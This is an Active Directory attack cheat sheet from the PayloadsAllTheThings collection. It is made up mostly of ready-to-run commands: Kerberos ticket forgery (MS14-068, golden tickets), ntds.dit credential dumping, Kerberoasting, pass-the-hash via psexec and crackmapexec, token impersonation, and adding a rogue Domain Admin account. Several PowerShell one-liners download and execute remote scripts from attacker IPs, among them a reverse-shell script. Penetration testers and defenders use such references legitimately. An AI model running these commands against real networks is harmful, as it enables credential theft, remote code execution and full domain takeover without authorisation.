PayloadsAllTheThings/Methodology and Resources/Active Directory Attack.md

Active Directory Attacks

Summary

• Tools
• Most common paths to AD compromise
  • MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
  • GPO - Pivoting with Local Admin & Passwords in SYSVOL
  • Dumping AD Domain Credentials
  • Golden Tickets
  • Silver Tickets
  • Trust Tickets
  • Kerberoast
  • Pass-the-Hash
  • OverPass-the-Hash (pass the key)
  • Dangerous Built-in Groups Usage
• Privilege Escalation
  • PrivEsc Local Admin - Token Impersonation (RottenPotato)
  • PrivEsc Local Admin - MS16-032
  • PrivEsc Local Admin - MS17-010 (Eternal Blue)
  • From Local Admin to Domain Admin

Tools

• Impacket
• Responder
• Mimikatz
• Ranger
• BloodHound
• AdExplorer
• CrackMapExec

git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443

• PowerSploit

powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"

Most common paths to AD compromise

MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)

Exploit Python: https://www.exploit-db.com/exploits/35474/
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum

git clone https://github.com/bidord/pykek
python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"

GPO - Pivoting with Local Admin & Passwords in SYSVOL

🚩 GPO Priorization : Organization Unit > Domain > Site > Local

Find password in SYSVOL

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

Metasploit modules to enumerate shares and credentials

scanner/smb/smb_enumshares
windows/gather/enumshares
windows/gather/credentials/gpp

List all GPO for a domain

Get-GPO -domaine DOMAIN.COM -all
Get-GPOReport -all -reporttype xml --all

Powersploit:
Get-NetGPO
Get-NetGPOGroup

Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)

C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit

or

vssadmin create shadow /for=C :
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit

then you need to use secretsdump to extract the hashes

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

Metasploit module

windows/gather/credentials/domain_hashdump

PowerSploit module

Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit

Golden Tickets

Forge a TGT, require krbtgt key

Mimikatz version

Get info - Mimikatz
lsadump::dcsync /user:krbtgt
lsadump::lsa /inject /name:krbtgt

Forge a Golden ticket - Mimikatz
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
kerberos::tgt

Meterpreter version

Get info - Meterpreter(kiwi)
dcsync_ntlm krbtgt
dcsync krbtgt

Forge a Golden ticket - Meterpreter
load kiwi
golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
kerberos_ticket_purge
kerberos_ticket_use /root/Downloads/pentestlabuser.tck
kerberos_ticket_list

Silver Tickets

Forge a TGS, require machine accound password (key) from the KDC

Trust Tickets

Kerberoast

https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
https://room362.com/post/2016/kerberoast-pt1/

./GetUserSPNS.py -request lab.ropnop.com/thoffman:Summer2017
(Impacket) Kerberoasting (ldap query, tgs in JTR format)

Pass-the-Hash

Note: the password can be replaced by a hash to execute a pass the hash attack.

use exploit/windows/smb/psexec
set RHOST 10.2.0.3
set SMBUser jarrieta
set SMBPass nastyCutt3r 
set PAYLOAD windows/meterpreter/bind_tcp
run
shell

or with crackmapexec
cme smb 10.2.0.2 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"

or with psexec
proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d

or with the builtin Windows RDP and mimikatz
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin"

OverPass-the-Hash (pass the key)

Request a TGT with only the NT hash

Using impacket
./getTGT.py -hashes :1a59bd44fe5bec39c44c8cd3524dee lab.ropnop.com
chmod 600 tgwynn.ccache

also with the AES Key if you have it 
./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com


ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
klist

Dangerous Built-in Groups Usage

AdminSDHolder

Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"
Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
or 
([adsisearcher]"(AdminCount=1)").findall()

Privilege Escalation

PrivEsc Local Admin - Token Impersonation (RottenPotato)

Binary available at : https://github.com/foxglovesec/RottenPotato
Binary available at : https://github.com/breenmachine/RottenPotatoNG

getuid
getprivs
use incognito
list\_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate\_token "NT AUTHORITY\SYSTEM"

Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"

PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)

Powershell:
https://www.exploit-db.com/exploits/39719/
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1

Binary exe : https://github.com/Meatballs1/ms16-032

Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc

PrivEsc Local Admin - MS17-010 (Eternal Blue)

nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 <ip_netblock>

From Local Admin to Domain Admin

net user hacker2 hacker123 /add /Domain
net group "Domain Admins" hacker2 /add /domain

Thanks to

• https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html
• Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher
• Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
• Golden ticket - Pentestlab
• Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r
• Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r
• Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin
• Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)
• Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView
• Pen Testing Active Directory Environments - Part III: Chasing Power Users
• Pen Testing Active Directory Environments - Part IV: Graph Fun
• Pen Testing Active Directory Environments - Part V: Admins and Graphs
• Pen Testing Active Directory Environments - Part VI: The Final Case
• Passing the hash with native RDP client (mstsc.exe) *Fun with LDAP, Kerberos (and MSRPC) in AD Environments